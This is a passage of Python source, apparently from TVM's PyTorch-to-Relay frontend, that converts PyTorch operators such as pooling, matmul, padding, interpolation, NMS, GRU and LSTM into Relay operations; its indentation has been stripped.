return _op.log(_op.exp(inputs[0] * beta) + _expr.const(1.0, dtype=dtype)) / beta
def make_avg_pool(self, dim):
def avg_pool(inputs, input_types):
data = inputs[0]
pool_size = self.convert_const_list(inputs[1])
strides = self.convert_const_list(inputs[2] if inputs[2] else pool_size)
padding = inputs[3]
ceil_mode = int(inputs[4])
count_include_pad = int(inputs[5])
def func(x):
if dim == 1:
return _op.nn.avg_pool1d(
x,
pool_size=pool_size,
strides=strides,
padding=padding,
dilation=(1,),
ceil_mode=ceil_mode,
count_include_pad=count_include_pad,
)
elif dim == 2:
return _op.nn.avg_pool2d(
x,
pool_size=pool_size,
strides=strides,
padding=padding,
dilation=(1, 1),
ceil_mode=ceil_mode,
count_include_pad=count_include_pad,
)
elif dim == 3:
return _op.nn.avg_pool3d(
x,
pool_size=pool_size,
strides=strides,
padding=padding,
dilation=(1, 1, 1),
ceil_mode=ceil_mode,
count_include_pad=count_include_pad,
)
else:
msg = "Average Pooling dimension should be between 1 and 3"
raise RuntimeError(msg)
if self.is_quantized_tensor(data):
return qnn_torch.apply_with_upcast(data, func)
return func(data)
return avg_pool
def linear(self, inputs, input_types):
# https://pytorch.org/docs/stable/nn.functional.html#linear
# 0 - input
# 1 - weight
bias = inputs[2]
a_shape = self.infer_shape_with_prelude(inputs[0])
b_shape = self.infer_shape_with_prelude(inputs[1])
if len(a_shape) == 2 and len(b_shape) == 2:
mm_out = _op.nn.dense(inputs[0], inputs[1])
elif len(b_shape) == 1:
mm_out = self.matmul([inputs[0], inputs[1]], input_types[:2])
else:
mm_out = self.matmul(
[inputs[0], _op.transpose(inputs[1], axes=(1, 0))], input_types[:2]
)
if isinstance(bias, _expr.Expr):
bias_ndims = len(self.infer_shape_with_prelude(bias))
if bias_ndims == 1:
return _op.nn.bias_add(mm_out, bias, axis=-1)
mm_dtype = self.infer_type_with_prelude(mm_out).dtype
return self.add([mm_out, bias], [mm_dtype, input_types[2]])
return mm_out
def dropout(self, inputs, input_types):
data = inputs[0]
rate = float(inputs[1])
return _op.nn.dropout(data, rate)
def make_reduce(self, name):
def reduce(inputs, input_types):
data = inputs[0]
axis = None
keepdims = False
if len(inputs) > 2: # default, torch have only data, axis=None, keepdims=False
if isinstance(inputs[1], int):
axis = int(inputs[1])
elif _is_int_seq(inputs[1]):
axis = inputs[1]
else:
axis = list(self.infer_shape(inputs[1]))
keepdims = bool(inputs[2])
return get_relay_op(name)(data, axis=axis, keepdims=keepdims)
return reduce
def norm(self, inputs, input_types):
data = inputs[0]
dtype = input_types[0]
axis = None
keepdims = False
if len(inputs) > 3:
axis = inputs[2]
keepdims = bool(inputs[3])
order = inputs[1]
if order == np.inf:
return _op.reduce.max(_op.abs(data), axis=axis, keepdims=keepdims)
elif order == np.NINF:
return _op.reduce.min(_op.abs(data), axis=axis, keepdims=keepdims)
else:
reci_order = _expr.const(1.0 / order, dtype=dtype)
order = _expr.const(order)
return _op.power(
_op.reduce.sum(_op.power(_op.abs(data), order), axis=axis, keepdims=keepdims),
reci_order,
)
def frobenius_norm(self, inputs, input_types):
data = inputs[0]
axis = None
keepdims = False
if len(inputs) > 2:
axis = inputs[1] if len(inputs[1]) > 0 else None
keepdims = bool(inputs[2])
return _op.sqrt(_op.reduce.sum((data * data), axis=axis, keepdims=keepdims))
def std(self, inputs, input_types):
data = inputs[0]
if len(inputs) == 2:
axis = None
keepdims = False
unbiased = bool(inputs[1])
else:
axis = inputs[1]
keepdims = bool(inputs[3])
unbiased = bool(inputs[2])
return _op.reduce.std(data, axis=axis, keepdims=keepdims, unbiased=unbiased)
def variance(self, inputs, input_types):
data = inputs[0]
if len(inputs) == 2:
axis = None
keepdims = False
unbiased = bool(inputs[1])
else:
axis = inputs[1]
keepdims = bool(inputs[3])
unbiased = bool(inputs[2])
return _op.reduce.variance(data, axis=axis, keepdims=keepdims, unbiased=unbiased)
def mean(self, inputs, input_types):
data = inputs[0]
if inputs[1]:
axis = inputs[1]
else:
axis = None
if len(inputs) > 2 and inputs[2]:
keepdims = int(inputs[2])
else:
keepdims = False
if len(inputs) > 3 and inputs[3]:
exclude = int(inputs[3])
else:
exclude = False
def func(x):
return _op.mean(x, axis, keepdims, exclude)
if self.is_quantized_tensor(data):
assert len(inputs) == 6, "Input quant param not found in op inputs"
input_scale = _expr.const(inputs[4])
input_zero_point = _expr.const(inputs[5])
return qnn_torch.quantized_mean(data, input_scale, input_zero_point, func)
return func(data)
def chunk(self, inputs, input_types):
data = inputs[0]
num_chunks = int(inputs[1])
axis = int(inputs[2])
if isinstance(data, _expr.Expr):
inferred_shape = self.infer_shape_with_prelude(data)
shape = []
for infer in inferred_shape:
shape.append(infer)
dim = int(shape[axis])
if dim % num_chunks:
unif_size = int(dim / (num_chunks - 1))
else:
unif_size = int(dim / num_chunks)
indeces = []
for i in range(unif_size, dim, unif_size):
indeces.append(i)
return _op.split(data, indeces, axis)
def matmul(self, inputs, input_types):
inputs_0 = inputs[0]
inputs_1 = inputs[1]
# Need to check input shape as batch matmul must be supported.
a_shape = self.infer_shape_with_prelude(inputs_0)
b_shape = self.infer_shape_with_prelude(inputs_1)
# When performing a batch matmul, we need to properly handle N-dim shapes.
if len(a_shape) > 2 and len(b_shape) > 2:
# Convert a into a 3 dimensional tensors.
need_reshape_output = False
if len(a_shape) != 3:
a = _op.reshape(inputs_0, [-1, a_shape[-2], a_shape[-1]])
need_reshape_output = True
else:
a = inputs_0
# Transpose matrix dimensions of b.
trans_axes = list(range(len(b_shape)))
trans_axes[-2], trans_axes[-1] = trans_axes[-1], trans_axes[-2]
b = _op.transpose(inputs_1, trans_axes)
# Convert b into a 3 dimensional tensor. Note that the last two dimensions
# are transposed.
if len(b_shape) != 3:
b = _op.reshape(b, [-1, b_shape[-1], b_shape[-2]])
# Perform a batch matmul.
output = _op.nn.batch_matmul(a, b)
# Reshape output to original dimensions.
if need_reshape_output:
return _op.reshape(output, [*a_shape[:-2], a_shape[-2], b_shape[-1]])
return output
elif len(a_shape) > 2:
inputs_0 = _op.reshape(inputs_0, [-1, a_shape[-1]])
if len(b_shape) > 2:
trans_axes = list(range(len(b_shape)))
trans_axes[-2], trans_axes[-1] = trans_axes[-1], trans_axes[-2]
input_1 = _op.reshape(_op.transpose(inputs_1, trans_axes), [-1, b_shape[-2]])
elif len(b_shape) == 2:
input_1 = _op.transpose(inputs_1, axes=(1, 0))
elif len(b_shape) == 1:
input_1 = _op.expand_dims(inputs_1, 0, 1)
out = _op.nn.dense(inputs_0, input_1)
if len(b_shape) == 1:
out = _op.squeeze(out, axis=[-1])
# Reshape output into a N dimensional tensor when a or b dim > 2
if len(a_shape) > 2:
out = _op.reshape(out, [*a_shape[:-1], b_shape[-1]])
elif len(b_shape) > 2:
out = _op.reshape(out, [a_shape[-2], -1, b_shape[-1]])
out = _op.reshape(
_op.transpose(out, [1, 0, 2]), [*b_shape[:-2], a_shape[-2], b_shape[-1]]
)
return out
def expand(self, inputs, input_types):
data_in = inputs[0]
shape = list(self.infer_shape(data_in))
ndims = len(shape)
sizes = inputs[1]
out = data_in
out_dims = len(sizes)
if ndims < out_dims:
num_newaxis = out_dims - ndims
out = _op.expand_dims(out, axis=0, num_newaxis=num_newaxis)
shape = [1] * num_newaxis + shape
for i in range(out_dims):
if sizes[i] != -1 and shape[i] == 1:
if not isinstance(sizes[i], int):
sizes[i] = int(_infer_value(sizes[i], {}).numpy())
out = _op.repeat(out, sizes[i], axis=i)
return out
def int(self, inputs, input_types):
if isinstance(inputs[0], _expr.Expr):
return inputs[0]
return int(inputs[0])
def identity(self, inputs, input_types):
return inputs[0]
def none(self, inputs, input_types):
return None
def make_pad(self, mode):
def pad(inputs, input_types):
data = inputs[0]
if isinstance(inputs[1], list):
pad_list = inputs[1]
else:
pad_list = list(self.infer_shape(inputs[1]))
# initialize paddings based on input len
pad_len = len(self.infer_shape(data)) * 2
paddings = [0] * pad_len
if len(pad_list) >= 2:
paddings[-1] = pad_list[1]
paddings[-2] = pad_list[0]
if len(pad_list) >= 4:
paddings[-3] = pad_list[3]
paddings[-4] = pad_list[2]
if len(pad_list) >= 6:
paddings[-5] = pad_list[5]
paddings[-6] = pad_list[4]
# group into tuple of 2 ints
paddings = [paddings[i : i + 2] for i in range(0, len(paddings), 2)]
const_paddings = []
for pad in paddings:
const_paddings.append([])
for p in pad:
if not isinstance(p, int):
p = int(_infer_value(p, {}).numpy())
const_paddings[-1].append(p)
if mode == "constant":
return _op.nn.pad(data, const_paddings, pad_value=inputs[2], pad_mode=mode)
else:
return _op.nn.pad(data, const_paddings, pad_mode=mode)
return pad
def clamp(self, inputs, input_types):
data = inputs[0]
def get_v(v, default_v):
if isinstance(v, _expr.Constant):
return float(v.data.numpy())
if isinstance(v, _expr.Expr):
infer_v, success = try_infer_value(v, lambda ret: float(ret))
if success:
return infer_v
if v is not None:
return v
return default_v
amin = get_v(inputs[1], np.finfo(np.float32).min)
amax = get_v(inputs[2], np.finfo(np.float32).max)
return _op.clip(data, amin, amax)
def to(self, inputs, input_types):
data = inputs[0]
dtype = inputs[1] if inputs[1] is not None and not isinstance(inputs[1], str) else inputs[2]
# special handling for aten::to(data, 6, _, _, _) case
# 6 means dtype = float
# this happens when converting upsampling with scale factor
cast_map = {
5: "float16",
6: "float32",
7: "float64",
3: "int32",
4: "int64",
}
cast_func = {5: float, 6: float, 7: float, 3: int, 4: int}
ret = data
if isinstance(data, _expr.Expr):
actual_dtype = str(self.infer_type(data).dtype)
if dtype in cast_map and cast_map[dtype] != actual_dtype:
ret = _op.cast(data, cast_map[dtype])
elif dtype in cast_map:
ret = cast_func[dtype](data)
return ret
def get_upsample_out_size(self, inputs, method):
# This assumes a static shape
out_size = []
if inputs[1] is not None:
for size in inputs[1]:
if not isinstance(size, int):
out_size.append(int(_infer_value(size, {}).numpy()))
else:
out_size.append(size)
else:
scale_index = 3 if method != "nearest_neighbor" else 2
scales = inputs[scale_index]
assert scales is not None, "neither out size nor scale provided"
assert isinstance(scales, list)
ishape = self.infer_shape(inputs[0])
for i, scale in enumerate(scales):
out_size.append(int(math.floor(float(ishape[2 + i]) * scale)))
return out_size
def make_upsample(self, method):
def upsample(inputs, input_types):
data = inputs[0]
out_size = self.get_upsample_out_size(inputs, method)
if len(inputs) > 2 and method != "nearest_neighbor":
align_corners = inputs[2]
else:
align_corners = False
if method == "nearest_neighbor":
coord_trans = "asymmetric"
elif align_corners:
coord_trans = "align_corners"
else:
coord_trans = "half_pixel"
def func(x):
return _op.image.resize2d(
x, out_size, "NCHW", method, coord_trans, cubic_alpha=-0.75
)
if self.is_quantized_tensor(data):
# input qparams are manually appended by us
assert isinstance(inputs[-2], float)
assert isinstance(inputs[-1], int)
input_scale = _expr.const(inputs[-2])
input_zero_point = _expr.const(inputs[-1])
return qnn_torch.quantized_upsample(data, input_scale, input_zero_point, func)
return func(data)
return upsample
def make_upsample3d(self, method):
def upsample3d(inputs, input_types):
data = inputs[0]
out_size = self.get_upsample_out_size(inputs, method)
if len(inputs) > 2 and method == "linear":
align_corners = inputs[2]
else:
align_corners = False
if method == "nearest_neighbor":
coord_trans = "asymmetric"
elif align_corners:
coord_trans = "align_corners"
else:
coord_trans = "half_pixel"
return _op.image.resize3d(data, out_size, "NCDHW", method, coord_trans)
return upsample3d
def expand_as(self, inputs, input_types):
target = inputs[1]
t0 = self.infer_type(inputs[0]).dtype
t1 = self.infer_type(inputs[1]).dtype
if str(t0) != str(t1):
target = _op.cast(target, t0)
return _op.broadcast_to_like(inputs[0], target)
def Bool(self, inputs, input_types):
assert len(inputs) == 1
return inputs[0]
def Float(self, inputs, input_types):
assert len(inputs) == 1
return _op.cast(inputs[0], "float32")
def bitwise_not(self, inputs, input_types):
data = inputs[0]
# The input tensor must be of integral or Boolean types.
# For bool tensors, it computes the logical NOT
if input_types[0] == "bool":
out = _op.logical_not(_op.cast(data, "bool"))
else:
out = _op.bitwise_not(_op.cast(data, "int"))
return out
def bitwise_xor(self, inputs, input_types):
lhs = inputs[0]
rhs = inputs[1]
lhs = _op.cast(lhs, "bool") if input_types[0] == "bool" else _op.cast(lhs, "int")
rhs = _op.cast(rhs, "bool") if input_types[1] == "bool" else _op.cast(rhs, "int")
return _op.bitwise_xor(lhs, rhs)
def logical_not(self, inputs, input_types):
data = _wrap_const(inputs[0])
return _op.logical_not(_op.cast(data, "bool"))
def logical_xor(self, inputs, input_types):
lhs = _op.cast(inputs[0], "bool")
rhs = _op.cast(inputs[1], "bool")
return _op.logical_xor(lhs, rhs)
def list_getitem(self, inputs, input_types):
return self.prelude.nth(inputs[0], _wrap_const(inputs[1]))
def list_len(self, inputs, input_types):
return self.prelude.length(inputs[0])
def type_as(self, inputs, input_types):
assert len(inputs) == 2
assert len(input_types) == 2
return _op.cast(inputs[0], input_types[1])
def gather(self, inputs, input_types):
data = inputs[0]
axis = inputs[1]
indices = inputs[2]
return _op.gather(data, axis, indices)
def add(self, inputs, input_types):
# add_ is overloaded for tensor add and list concat
if input_types[0] == "ListType":
return self.prelude.concat(inputs[0], inputs[1])
return self.make_elemwise("add")(inputs, input_types)
def tensor_array_stack(self, inputs, input_types):
dim = inputs[1]
assert dim == 0, "stacking on a dynamic tensor list only supported on a first axis"
tensor_array, shape = self.convert_to_tensor_array(inputs[0])
stacked_shape = (Any(),) + shape
stack = self.prelude.get_global_var_static("tensor_array_stack", "float32", shape)
stacked = stack(tensor_array)
static_tensor_array_ops = StaticTensorArrayOps(self.prelude, "float32", stacked_shape)
static_tensor_array_ops.register()
get_tensor = self.prelude.get_global_var_static("tensor_get_data", "float32", stacked_shape)
return get_tensor(stacked)
def stack(self, inputs, input_types):
if isinstance(inputs[0], list):
# a static python list of tensors
dim = inputs[1]
return _op.stack(inputs[0], dim)
else:
# List ADT case
assert isinstance(inputs[0], _expr.Expr)
ty = self.infer_type_with_prelude(inputs[0])
list_ty = self.prelude.mod.get_global_type_var("List")
msg = "The input list is expected to be List ADT"
assert isinstance(ty, tvm.ir.TypeCall) and ty.func == list_ty, msg
return self.tensor_array_stack(inputs, input_types)
def rsub(self, inputs, input_types):
data0, data1 = self.pytorch_promote_types(inputs[:2], input_types[:2])
# TODO (t-vi): should this also be part of the type promotion?
alpha = _expr.const(float(inputs[2]))
# note: rsub means data0 and data1 swap places
return get_relay_op("subtract")(data1, alpha * data0)
def embedding(self, inputs, input_types):
weight = inputs[0]
indices = inputs[1]
return _op.take(weight, indices.astype("int32"), axis=0)
def one_hot(self, inputs, input_types):
indices = inputs[0].astype("int32")
num_classes = inputs[1]
if num_classes == -1:
msg = "Inferring the number of classes is not yet supported."
raise NotImplementedError(msg)
dtype = "int32"
on_value = tvm.relay.const(1.0, dtype)
off_value = tvm.relay.const(0.0, dtype)
return _op.one_hot(indices, on_value, off_value, num_classes, -1, dtype)
def index(self, inputs, input_types):
data = inputs[0]
indices = inputs[1]
return _op.adv_index([data] + indices)
def meshgrid(self, inputs, input_types):
data = inputs[0]
return _op.meshgrid(data, indexing="ij")
def nms(self, inputs, input_types):
boxes = inputs[0]
scores = inputs[1]
iou_threshold = inputs[2]
# TVM NMS assumes score > 0
scores = scores - _op.min(scores) + _op.const(1.0)
num_boxes = _op.shape_of(scores)
# PyTorch NMS doesn't have score_threshold, so no need to run get_valid_count
indices = _op.transform.arange(_op.squeeze(num_boxes), dtype="int32")
indices = _op.expand_dims(indices, 0, 1)
# Generate data with shape (1, num_anchors, 5)
scores = AttrCvt(op_name="expand_dims", extras={"axis": -1, "num_newaxis": 1})([scores], {})
data = _op.concatenate([scores, boxes], -1)
data = _op.expand_dims(data, 0, 1)
# Perform Non-Maximum Suppression,
# PyTorch NMS doesn't have parameter top_k and max_output_size
score_index = 0
top_k = max_out_size = -1
nms_ret = get_relay_op("non_max_suppression")(
data=data,
valid_count=num_boxes,
indices=indices,
max_output_size=max_out_size,
iou_threshold=iou_threshold,
force_suppress=True,
top_k=top_k,
coord_start=1,
score_index=score_index,
id_index=-1,
return_indices=True,
invalid_to_bottom=False,
)
# squeeze the two outputs of nms for strided_slice
size = get_relay_op("squeeze")(nms_ret[1], axis=[1])
data_slice = get_relay_op("squeeze")(nms_ret[0], axis=[0])
# strided slice to get the dynamic result
ret = get_relay_op("strided_slice")(
data_slice, begin=_expr.const([0]), end=size, slice_mode="size"
)
# in torchvision, indices from nms are int64
return _op.cast(ret, "int64")
def logsumexp(self, inputs, input_types):
data = self.pytorch_promote_types(inputs[:1], input_types[:1])
dim_list = inputs[1]
keepdim = inputs[2] if len(inputs) > 2 else False
# dim is output of prim::ListConstruct, even if it is int in python code
assert isinstance(dim_list, list), "dim is expected to be a list"
return _op.logsumexp(data[0], axis=dim_list, keepdims=keepdim)
def roi_align(self, inputs, input_types):
data = inputs[0]
boxes = inputs[1]
output_size = (inputs[3], inputs[4])
spatial_scale = inputs[2]
sample_ratio = inputs[5]
aligned = False if len(inputs) < 7 else inputs[6]
if aligned:
boxes -= _expr.const(0.5 / spatial_scale)
return _op.vision.roi_align(data, boxes, output_size, spatial_scale, sample_ratio)
def deform_conv2d(self, inputs, input_types):
data = inputs[0]
weight = inputs[1]
offset = inputs[2]
strides = (inputs[4], inputs[5])
padding = (inputs[6], inputs[7])
dilation = (inputs[8], inputs[9])
groups = inputs[10]
deformable_groups = inputs[11]
weight_shape = self.infer_shape(weight)
output_channels = weight_shape[0]
kernel_size = (weight_shape[2], weight_shape[3])
return _op.nn.deformable_conv2d(
data,
offset,
weight,
strides,
padding,
dilation,
deformable_groups,
groups,
output_channels,
kernel_size,
)
def unbind(self, inputs, input_types):
data = inputs[0]
axis = int(inputs[1])
return unbind(data, axis)
def shape_as_tensor(self, inputs, input_types):
is_symbolic_shape = False
input_shape = self.infer_shape(inputs[0], self.prelude.mod)
for axis in input_shape:
if not isinstance(axis, (int, tvm.tir.IntImm)):
is_symbolic_shape = True
break
if is_symbolic_shape:
ret = _op.shape_of(inputs[0], dtype="int64")
else:
ret = _expr.const(np.array(input_shape), dtype="int64")
return ret
def logical_and(self, inputs, input_types):
lhs = _op.cast(inputs[0], "bool")
rhs = _op.cast(inputs[1], "bool")
return _op.logical_and(lhs, rhs)
def nonzero(self, inputs, input_types, is_numpy_style=False):
data = inputs[0]
ret = _op.transform.argwhere(data)
if is_numpy_style or (len(inputs) > 1 and inputs[1]):
return unbind(ret, 1)
return ret
def nonzero_numpy(self, inputs, input_types):
return self.nonzero(inputs, input_types, is_numpy_style=False)
def scatter(self, inputs, input_types):
data = inputs[0]
axis = int(inputs[1])
index = inputs[2]
src = inputs[3]
return _op.transform.scatter(data, index, src, axis)
def index_put(self, inputs, input_types):
in_tensor = inputs[0]
indices = inputs[1]
values = inputs[2]
accumulate = inputs[3]
if not accumulate:
mode = "update"
else:
mode = "add"
# Combine array of index tensors into one index tensor with shape (N,_)
index_tensor = _op.stack(indices, axis=0)
return _op.transform.scatter_nd(in_tensor, index_tensor, values, mode)
def scalar_tensor(self, inputs, input_types):
data = inputs[0]
cast_map = {
6: "float32",
7: "float64",
3: "int32",
4: "int64",
}
type_key = inputs[1]
if isinstance(data, _expr.Constant):
data = data.data.numpy().tolist()
return _expr.const(data, cast_map[type_key])
def interpolate(self, inputs, input_types):
if isinstance(inputs[1], _expr.Expr):
out_size = inputs[1]
elif isinstance(inputs[1], list):
out_size = []
for i in [0, 1]:
size, _ = try_infer_value(
inputs[1][i],
lambda ret: ret.astype(np.int),
lambda: _op.expand_dims(inputs[1][i], axis=0),
)
out_size.append(size)
out_size = _op.concatenate(out_size, axis=0)
data = inputs[0]
align_corners = inputs[4]
method = inputs[3]
if method.startswith("nearest"):
method = "nearest_neighbor"
elif method[0:2] == "bi":
method = method[2:]
if method == "nearest_neighbor":
coord_trans = "asymmetric"
elif align_corners:
coord_trans = "align_corners"
else:
coord_trans = "half_pixel"
return _op.image.resize2d(data, out_size, "NCHW", method, coord_trans, cubic_alpha=-0.75)
def numel(self, inputs, input_types):
return _op.ndarray_size(inputs[0])
def empty(self, inputs, input_types):
shape = inputs[0]
return _op.zeros(shape, _convert_dtype_value(inputs[1]))
def bincount(self, inputs, input_types):
data = inputs[0]
weights = inputs[1]
input_type = self.infer_type(data).dtype
if input_type == "int64":
logging.warning(
"Casting an int64 input to int32, since we do not have int64 atomic add"
"needed for bincount yet."
)
data = _op.cast(data, "int32")
maximum = _op.max(data)
dim = maximum + _expr.const(1, dtype="int32")
if weights:
weight_type = self.infer_type(weights)
out_dtype = weight_type.dtype
updates = weights
else:
out_dtype = "int32"
updates = _op.ones_like(data)
counts = _op.zeros(_op.reshape(dim, [1]), out_dtype)
out = _op.scatter_add(counts, data, updates, axis=0)
if input_type == "int32":
# Torch always outputs int64 results for bincount
return _op.cast(out, "int64")
return out
def scatter_add(self, inputs, input_types):
data = inputs[0]
axis = inputs[1]
index = inputs[2]
src = inputs[3]
return _op.scatter_add(data, index, src, axis=axis)
def cumsum(self, inputs, input_types):
data = inputs[0]
dim = inputs[1]
dtype = inputs[2]
if inputs[2] is not None:
dtype = _convert_dtype_value(inputs[2])
return _op.cumsum(data, axis=dim, dtype=dtype)
def masked_fill(self, inputs, input_types):
mask = inputs[1]
value = _op.cast(_wrap_const(inputs[2]), input_types[0])
return _op.where(mask, value, inputs[0])
def masked_select(self, inputs, input_types):
mask = inputs[1]
indices = self.nonzero([mask], input_types, is_numpy_style=True)
return _op.adv_index([inputs[0]] + [indices[i] for i in range(indices.size)])
def sort(self, inputs, input_types):
data = inputs[0]
dim = inputs[1]
is_descending = inputs[2]
# pytorch sort returns both sorted indices and values
indices = _op.argsort(data, dim, not is_descending)
return _op.gather(data, dim, indices), indices
def argsort(self, inputs, input_types):
data = inputs[0]
dim = inputs[1]
is_descending = inputs[2]
return _op.argsort(data, dim, not is_descending)
def is_floating_point(self, inputs, input_types):
assert len(inputs) == 1
if isinstance(inputs[0], _expr.Expr):
input_type = self.infer_type(inputs[0]).dtype
else:
input_type = input_types[0]
is_float = input_type in ["float32", "float64", "float16", "bfloat16"]
return _expr.const(is_float)
def unique(self, inputs, input_types):
assert len(inputs) == 4
[data, is_sorted, return_inverse, return_counts] = inputs
if not is_sorted:
logging.warning("TVM always assumes sorted=True for torch.unique")
is_sorted = True
if return_counts:
[unique, indices, inverse_indices, num_uniq, counts] = _op.unique(
data, is_sorted=is_sorted, return_counts=True
)
unique_sliced = _op.strided_slice(unique, begin=[0], end=num_uniq, slice_mode="size")
counts_sliced = _op.strided_slice(counts, begin=[0], end=num_uniq, slice_mode="size")
return (unique_sliced, inverse_indices, counts_sliced)
else:
[unique, indices, inverse_indices, num_uniq] = _op.unique(
data, is_sorted=is_sorted, return_counts=False
)
unique_sliced = _op.strided_slice(unique, begin=[0], end=num_uniq, slice_mode="size")
return (unique_sliced, inverse_indices)
def nll_loss(self, inputs, input_types):
assert len(inputs) == 5
[predictions, targets, weights, reduction, ignore_index] = inputs
num_class = self.infer_shape(predictions)[1]
if reduction == 0:
reduction = "none"
elif reduction == 1:
reduction = "mean"
else:
reduction = "sum"
if weights is None:
weights = _op.full(_expr.const(1), (num_class,), dtype=input_types[0])
return _op.nn.nll_loss(predictions, targets, weights, reduction, ignore_index)
def flip(self, inputs, input_types):
data = inputs[0]
axis = inputs[1]
return _op.transform.reverse(data, axis=axis[0])
def bidir_gru_cell(
self,
input_seqs,
weights_dicts,
):
"""
Bidirectional GRU cell
"""
seq_len = len(input_seqs)
forward_outputs, fw_H_t = gru_cell(
input_seqs,
**weights_dicts[0],
)
reverse_outputs, rev_H_t = gru_cell(
input_seqs,
**weights_dicts[1],
backwards=True,
)
final_outputs = []
for i in range(seq_len):
final_outputs.append(
_op.concatenate([forward_outputs[i], reverse_outputs[seq_len - 1 - i]], axis=-1)
)
return final_outputs, _op.stack([fw_H_t, rev_H_t], axis=0)
def gru_layers(self, input_data, layer_weights_dicts, bidirectional, dropout_p=0.0):
"""
Methods iterates layers for Stacked GRU
"""
layers_num = len(layer_weights_dicts)
# split input sequence to samples set
input_seqs = unbind(input_data, 0) # [seq_num, (batch, feature_size)]
output_hiddens = []
for i in range(layers_num):
weights_dicts = layer_weights_dicts[i]
# input_seqs shape = [seq_num, (batch, feature_size)] or
# [seq_num, (batch, 2*feature_size)] for bidirectional
if bidirectional:
input_seqs, H_t = self.bidir_gru_cell(input_seqs, weights_dicts)
else:
input_seqs, H_t = gru_cell(input_seqs, **weights_dicts[0])
output_hiddens.append(H_t)
# TODO (vvchernov): in pytorch implementation train is also checked
# see https://github.com/pytorch/pytorch/blob/70c8daf43946b53af6493d058899ef952d27d339
# /aten/src/ATen/native/RNN.cpp#L1054
if dropout_p != 0 and i < layers_num - 1:
# for input in input_seqs:
# input = _op.dropout(input, dropout_p)
raise NotImplementedError("Dropout for GRU has not been supported yet!")
return _op.stack(input_seqs, 0), _op.stack(output_hiddens, 0)
def gru(self, inputs, input_types):
"""
Description of GRU in pytorch:
https://pytorch.org/docs/stable/generated/torch.nn.GRU.html?highlight=gru#torch.nn.GRU
"""
# TODO (vvchernov): support dropout
assert len(inputs) == 9, "Input of size 9 is expected"
# Unpack inputs, note that if optional and not provided then value will be None.
_X = inputs[0]
# _X shape (seq_num, batch, feature_size) or (batch, seq_num, feature_size)
hidden_state = inputs[1]
# Hidden state shape (hidden_layers_num, batch, hidden_size)
_weights = inputs[2]
# Wi layer[0] shape (3 * hidden_size, feature_size)
# Wh layer[0] shape (3 * hidden_size, hidden_size)
# Bi layer[0] shape (3 * hidden_size)
# Bh layer[0] shape (3 * hidden_size)
# Wi layer[>0] shape (3 * hidden_size, hidden_size * num_directions)
# Wh layer[>0] shape (3 * hidden_size, hidden_size)
# Bi layer[>0] shape (3 * hidden_size)
# Bh layer[>0] shape (3 * hidden_size)
# Scalar inputs
has_biases = inputs[3]
num_layers = inputs[4]
dropout_p = inputs[5] # dropout probability, if 0.0 it means there is no dropout
# train = inputs[6]
bidirectional = inputs[7]
batch_first = inputs[8]
num_directions = 1
if bidirectional:
num_directions = 2
rsd = len(_weights) % num_layers
assert rsd == 0, "The number of weights must be a multiple of the number of layers!"
rsd = (len(_weights) / num_layers) % num_directions
assert (
rsd == 0
), "The number of weights in layer must be a multiple of the number of directions!"
weights_num = int(len(_weights) / num_layers / num_directions)
if has_biases:
assert weights_num == 4, "The weights number in layer is expected equal to 4"
else:
assert weights_num == 2, "The weights number in layer is expected equal to 2"
X = _op.transpose(_X, (1, 0, 2)) if batch_first else _X
# TODO (vvchernov): Which data type should be used? from input or weights?
# Instead of it _infer_type(X).checked_type.dtype can be used
X_dtype = input_types[0]
X_shape = _infer_shape(X) # (seq_num, batch, feature_size)
hidden_size = int(_infer_shape(_weights[0])[0] / 3)
batch_size = X_shape[1]
# Initialize hidden states if not provided.
layers_h = []
hidden_layers_num = num_directions * num_layers
if hidden_state is None:
h_0 = _op.zeros((batch_size, hidden_size), X_dtype)
for i in range(hidden_layers_num):
layers_h.append(h_0)
else:
layers_h = unbind(hidden_state, 0)
layer_weights_dicts = []
k = 0 # layer counter
if has_biases:
names = ["hidden_state", "w_inp", "w_hid", "b_inp", "b_hid"]
if bidirectional:
rsd = len(_weights) % (2 * weights_num)
assert rsd == 0, "got an incorrect number of GRU weights"
for i in range(0, len(_weights), 2 * weights_num):
fw_tensors = [layers_h[2 * k], *_weights[i : i + 4]]
fw_weights_dict = dict(zip(names, fw_tensors))
j = i + weights_num
rev_tensors = [layers_h[2 * k + 1], *_weights[j : j + 4]]
rev_weights_dict = dict(zip(names, rev_tensors))
layer_weights_dicts.append([fw_weights_dict, rev_weights_dict])
k += 1
else:
assert len(_weights) % weights_num == 0, "got an incorrect number of GRU weights"
for i in range(0, len(_weights), weights_num):
fw_tensors = [layers_h[k], *_weights[i : i + 4]]
fw_weights_dict = dict(zip(names, fw_tensors))
layer_weights_dicts.append([fw_weights_dict])
k += 1
else:
names = ["hidden_state", "w_inp", "w_hid"]
if bidirectional:
rsd = len(_weights) % (2 * weights_num)
assert rsd == 0, "got an incorrect number of GRU weights"
for i in range(0, len(_weights), 2 * weights_num):
fw_tensors = [layers_h[2 * k], *_weights[i : i + 2]]
fw_weights_dict = dict(zip(names, fw_tensors))
j = i + weights_num
rev_tensors = [layers_h[2 * k + 1], *_weights[j : j + 2]]
rev_weights_dict = dict(zip(names, rev_tensors))
layer_weights_dicts.append([fw_weights_dict, rev_weights_dict])
k += 1
else:
assert len(_weights) % weights_num == 0, "got an incorrect number of GRU weights"
for i in range(0, len(_weights), weights_num):
fw_tensors = [layers_h[k], *_weights[i : i + 2]]
fw_weights_dict = dict(zip(names, fw_tensors))
layer_weights_dicts.append([fw_weights_dict])
k += 1
assert (
len(layer_weights_dicts) == num_layers and k == num_layers
), "For stacked GRU number of weights sets should be the same as number of layers!"
output, out_hidden_state = self.gru_layers(
X,
layer_weights_dicts,
bidirectional,
dropout_p=dropout_p,
)
# output shape = (seq_num, batch, hidden_size) or
# (seq_num, batch, 2*feature_size) for bidirectional
if batch_first:
output = _op.transpose(output, (1, 0, 2))
return (output, out_hidden_state)
def bidir_lstm_cell(
self,
input_seqs,
weights_dicts,
):
"""
Bidirectional LSTM cell
"""
seq_len = len(input_seqs)
forward_outputs, fw_H_t, fw_C_t = lstm_cell(
input_seqs,
**weights_dicts[0],
)
reverse_outputs, rev_H_t, rev_C_t = lstm_cell(
input_seqs,
**weights_dicts[1],
backwards=True,
)
final_outputs = []
for i in range(seq_len):
final_outputs.append(
_op.concatenate([forward_outputs[i], reverse_outputs[seq_len - 1 - i]], axis=-1)
)
return final_outputs, (fw_H_t, fw_C_t), (rev_H_t, rev_C_t)
def lstm_layers(self, input_data, layer_weights_dicts, bidirectional, dtype, dropout_p=0.0):
"""
Methods iterates layers for Stacked LSTM
"""
layers_num = len(layer_weights_dicts)
